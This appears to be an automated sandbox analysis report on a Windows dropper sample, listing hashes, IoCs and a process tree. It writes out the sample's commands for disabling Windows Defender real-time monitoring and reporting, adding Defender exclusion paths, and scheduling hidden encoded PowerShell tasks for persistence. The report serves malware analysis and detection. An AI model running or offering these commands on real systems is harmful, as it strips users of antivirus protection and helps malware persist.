Analysis
- max time kernel: 148s
- max time network: 154s
- platform: windows7_x64
- resource: win7-20231020-en
- resource tags: arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
- submitted: 11/12/2023, 03:12

Static task: static1
Behavioral task: behavioral1
Sample: e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe
Resource: win7-20231020-en
General
- Target: e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe
- Size: 7.2MB
- MD5: ce3185730246203700a23e2bca796d99
- SHA1: 0df5c4d7f5352dbe6ffedf575282f09faedf788f
- SHA256: e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8
- SHA512: ce19257d2e6187e3071253b869f62dd119b52425ff58a46c8a644831d01d4652124f0323653a96703929b2a5bafcc2392d2102397cbf8cfc321e859126b8d8c2
- SSDEEP: 196608:91Orab2X1JKmRNu34cJcyd8/1cj+b3Y6pR0c9zw3Zzxaq:3Or2M1JKIuLJJdacw3Y6pR0cuf
Malware Config
Signatures
Modifies Windows Defender Real-time Protection settings 4 IoCs
(description / ioc / process)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" (reg.exe)

Windows security bypass 40 IoCs
(description / ioc / process; every entry is written by reg.exe)
- Set value (int): each of the following paths is set to "0" once under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\ and once under \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\ (20 entries):
  - C:\Program Files (x86)\hlHvxOmTEzGU2
  - C:\Program Files (x86)\cvlBDCdIHRUn
  - C:\Program Files (x86)\zYDdeyryU
  - C:\Program Files (x86)\UJbqbYGEalpLkUITJzR
  - C:\Program Files (x86)\DDDIXrwIFTXkC
  - C:\ProgramData\VYfzEhPxBNNTaEVB
  - C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt
  - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions
  - C:\Windows\Temp\zlCauFJzutozcZAJ (set twice in each view)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths (10 entries)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths (10 entries)
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Install.exe)

Executes dropped EXE 4 IoCs
(pid / process)
- 1916 Install.exe
- 2836 Install.exe
- 1000 NjIJeDk.exe
- 592 PzPPUFP.exe

Loads dropped DLL 8 IoCs
(pid / process)
- 2080 e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe
- 1916 Install.exe (4 entries)
- 2836 Install.exe (3 entries)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Drops file in System32 directory 9 IoCs
(description / ioc / process)
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.EXE, 4 entries)
- File opened for modification: C:\Windows\system32\GroupPolicy\gpt.ini (NjIJeDk.exe)
- File opened for modification: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat (PzPPUFP.exe)
- File created: C:\Windows\system32\GroupPolicy\gpt.ini (Install.exe)
- File created: C:\Windows\system32\GroupPolicy\Machine\Registry.pol (NjIJeDk.exe)
- File opened for modification: C:\Windows\system32\GroupPolicy\Machine\Registry.pol (NjIJeDk.exe)

Drops file in Program Files directory 5 IoCs
(description / ioc / process)
- File created: C:\Program Files\Mozilla Firefox\browser\omni.ja.bak (PzPPUFP.exe)
- File opened for modification: C:\Program Files\Mozilla Firefox\browser\omni.ja (PzPPUFP.exe)
- File created: C:\Program Files (x86)\zYDdeyryU\FxDvaL.dll (PzPPUFP.exe)
- File created: C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi (PzPPUFP.exe)
- File opened for modification: C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi (PzPPUFP.exe)

Drops file in Windows directory 3 IoCs
(description / ioc / process)
- File created: C:\Windows\Tasks\btngLezmYLEbkDGphz.job (schtasks.exe)
- File created: C:\Windows\Tasks\qxdnhmFGwPNMbPaLO.job (schtasks.exe)
- File created: C:\Windows\Tasks\VgITaIvscZwKwBA.job (schtasks.exe)

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
(pid / process)
- 2636 schtasks.exe
- 2816 schtasks.exe
- 1332 schtasks.exe
- 2572 schtasks.exe
- 516 schtasks.exe
- 1976 schtasks.exe
- 3048 schtasks.exe
Enumerates system info in registry 2 TTPs 2 IoCs
(description / ioc / process)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (Install.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (Install.exe)

Modifies data under HKEY_USERS 18 IoCs
(description / ioc / process)
- Set value (data): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (PzPPUFP.exe)
- Set value (str): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" (PzPPUFP.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad (PzPPUFP.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (wscript.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings (wscript.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host (wscript.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (wscript.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" (wscript.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections (PzPPUFP.exe)
- Set value (str): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix (PzPPUFP.exe)
- Set value (str): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" (PzPPUFP.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" (PzPPUFP.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software (wscript.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (PzPPUFP.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" (wscript.exe)
- Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings (PzPPUFP.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings (PzPPUFP.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft (wscript.exe)
Suspicious behavior: EnumeratesProcesses 20 IoCs
(pid / process)
- 2540 powershell.EXE (3 entries)
- 1588 powershell.EXE (3 entries)
- 3004 powershell.EXE (3 entries)
- 2192 powershell.EXE (3 entries)
- 592 PzPPUFP.exe (8 entries)

Suspicious use of AdjustPrivilegeToken 4 IoCs
(description / pid / process)
- Token: SeDebugPrivilege, 2540 powershell.EXE
- Token: SeDebugPrivilege, 1588 powershell.EXE
- Token: SeDebugPrivilege, 3004 powershell.EXE
- Token: SeDebugPrivilege, 2192 powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs
(description / pid / process / procid_target; identical rows collapsed with their count)
- PID 2080 wrote to memory of 1916, 2080 e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe, target 28 (7 entries)
- PID 1916 wrote to memory of 2836, 1916 Install.exe, target 29 (7 entries)
- PID 2836 wrote to memory of 2564, 2836 Install.exe, target 31 (7 entries)
- PID 2836 wrote to memory of 2932, 2836 Install.exe, target 33 (7 entries)
- PID 2932 wrote to memory of 2692, 2932 forfiles.exe, target 35 (7 entries)
- PID 2564 wrote to memory of 2916, 2564 forfiles.exe, target 36 (7 entries)
- PID 2692 wrote to memory of 2784, 2692 cmd.exe, target 37 (7 entries)
- PID 2916 wrote to memory of 2724, 2916 cmd.exe, target 38 (7 entries)
- PID 2692 wrote to memory of 2800, 2692 cmd.exe, target 39 (7 entries)
- PID 2916 wrote to memory of 320, 2916 cmd.exe, target 40 (1 entry)
Processes
(process tree; [n] is the nesting depth, each entry gives image path, command line, PID and the signatures hit by that process. The "&REG" fragments had been rendered as "®" by the page's HTML and are restored here. The -EncodedCommand value used by every scheduled task below decodes from UTF-16LE base64 to: start-process -WindowStyle Hidden gpupdate.exe /force, which matches the gpupdate.exe child processes seen under powershell.EXE.)

[1] PID 2080  C:\Users\Admin\AppData\Local\Temp\e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] PID 1916  C:\Users\Admin\AppData\Local\Temp\7zS4663.tmp\Install.exe
      cmd: .\Install.exe
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
    [3] PID 2836  C:\Users\Admin\AppData\Local\Temp\7zS49AD.tmp\Install.exe
        cmd: .\Install.exe /MmqydidDY "525403" /S
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Loads dropped DLL
        - Drops file in System32 directory
        - Enumerates system info in registry
        - Suspicious use of WriteProcessMemory
      [4] PID 2564  C:\Windows\SysWOW64\forfiles.exe
          cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          - Suspicious use of WriteProcessMemory
        [5] PID 2916  C:\Windows\SysWOW64\cmd.exe
            cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            - Suspicious use of WriteProcessMemory
          [6] PID 2724  \??\c:\windows\SysWOW64\reg.exe
              cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
          [6] PID 320  \??\c:\windows\SysWOW64\reg.exe
              cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
      [4] PID 2932  C:\Windows\SysWOW64\forfiles.exe
          cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
          - Suspicious use of WriteProcessMemory
        [5] PID 2692  C:\Windows\SysWOW64\cmd.exe
            cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            - Suspicious use of WriteProcessMemory
          [6] PID 2784  \??\c:\windows\SysWOW64\reg.exe
              cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
          [6] PID 2800  \??\c:\windows\SysWOW64\reg.exe
              cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
      [4] PID 2572  C:\Windows\SysWOW64\schtasks.exe
          cmd: schtasks /CREATE /TN "ggPxzAMra" /SC once /ST 00:02:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          - Creates scheduled task(s)
      [4] PID 2632  C:\Windows\SysWOW64\schtasks.exe
          cmd: schtasks /run /I /tn "ggPxzAMra"
      [4] PID 1540  C:\Windows\SysWOW64\schtasks.exe
          cmd: schtasks /DELETE /F /TN "ggPxzAMra"
      [4] PID 516  C:\Windows\SysWOW64\schtasks.exe
          cmd: schtasks /CREATE /TN "btngLezmYLEbkDGphz" /SC once /ST 03:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\NjIJeDk.exe\" Bp /Drsite_idNrT 525403 /S" /V1 /F
          - Drops file in Windows directory
          - Creates scheduled task(s)

[1] PID 3068  C:\Windows\system32\taskeng.exe
    cmd: taskeng.exe {8D014434-B477-4C22-A981-D2762D984554} S-1-5-21-2084844033-2744876406-2053742436-1000:GGPVHMXR\Admin:Interactive:[1]
  [2] PID 2540  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] PID 2032  C:\Windows\system32\gpupdate.exe
        cmd: "C:\Windows\system32\gpupdate.exe" /force
  [2] PID 1588  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] PID 904  C:\Windows\system32\gpupdate.exe
        cmd: "C:\Windows\system32\gpupdate.exe" /force
  [2] PID 3004  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] PID 2796  C:\Windows\system32\gpupdate.exe
        cmd: "C:\Windows\system32\gpupdate.exe" /force
  [2] PID 2192  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] PID 3016  C:\Windows\system32\gpupdate.exe
        cmd: "C:\Windows\system32\gpupdate.exe" /force

[1] PID 1196  C:\Windows\system32\gpscript.exe
    cmd: gpscript.exe /RefreshSystemParam

[1] PID 1888  C:\Windows\system32\taskeng.exe
    cmd: taskeng.exe {A7BFDB3D-2986-443E-9685-144998B70F9D} S-1-5-18:NT AUTHORITY\System:Service:
  [2] PID 1000  C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\NjIJeDk.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\NjIJeDk.exe Bp /Drsite_idNrT 525403 /S
      - Executes dropped EXE
      - Drops file in System32 directory
    [3] PID 1976  C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /CREATE /TN "gThcjpGwI" /SC once /ST 00:47:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Creates scheduled task(s)
    [3] PID 1792  C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /run /I /tn "gThcjpGwI"
    [3] PID 1972  C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /DELETE /F /TN "gThcjpGwI"
    [3] PID 2144  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      [4] PID 1608  C:\Windows\SysWOW64\reg.exe
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
          - Modifies Windows Defender Real-time Protection settings
    [3] PID 3052  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      [4] PID 2164  C:\Windows\SysWOW64\reg.exe
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
          - Modifies Windows Defender Real-time Protection settings
    [3] PID 3048  C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /CREATE /TN "gwliQqMVJ" /SC once /ST 00:19:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Creates scheduled task(s)
    [3] PID 2936  C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /run /I /tn "gwliQqMVJ"
    [3] PID 2992  C:\Windows\SysWOW64\schtasks.exe
        cmd: schtasks /DELETE /F /TN "gwliQqMVJ"
    [3] PID 2884  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:32
      [4] PID 1960  C:\Windows\SysWOW64\reg.exe
          cmd: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
    [3] PID 2908  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:64
      [4] PID 2540  C:\Windows\SysWOW64\reg.exe
          cmd: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
    [3] PID 1056  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:32
      [4] PID 2016  C:\Windows\SysWOW64\reg.exe
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:32
    [3] PID 852  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:64
      [4] PID 1016  C:\Windows\SysWOW64\reg.exe
          cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:64
    [3] PID 1652  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /C copy nul "C:\Windows\Temp\zlCauFJzutozcZAJ\ygwFtFPI\oQviYWbBtuIQsPhh.wsf"
    [3] PID 1568  C:\Windows\SysWOW64\wscript.exe
        cmd: wscript "C:\Windows\Temp\zlCauFJzutozcZAJ\ygwFtFPI\oQviYWbBtuIQsPhh.wsf"
        - Modifies data under HKEY_USERS
      [4] PID 2368  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] PID 2500  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DDDIXrwIFTXkC" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] PID 1520  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] PID 1120  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UJbqbYGEalpLkUITJzR" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] PID 1460  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cvlBDCdIHRUn" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] PID 2744  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cvlBDCdIHRUn" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] PID 2012  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlHvxOmTEzGU2" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] PID 564  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hlHvxOmTEzGU2" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] PID 1216  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYDdeyryU" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] PID 2028  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYDdeyryU" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] PID 2280  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VYfzEhPxBNNTaEVB" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] PID 328  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VYfzEhPxBNNTaEVB" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] PID 2752  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] PID 1576  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] PID 2812  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] PID 2964  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] PID 2076  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:32
          - Windows security bypass
      [4] PID 1400  C:\Windows\SysWOW64\reg.exe
          cmd: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\zlCauFJzutozcZAJ" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] PID 832  C:\Windows\SysWOW64\reg.exe
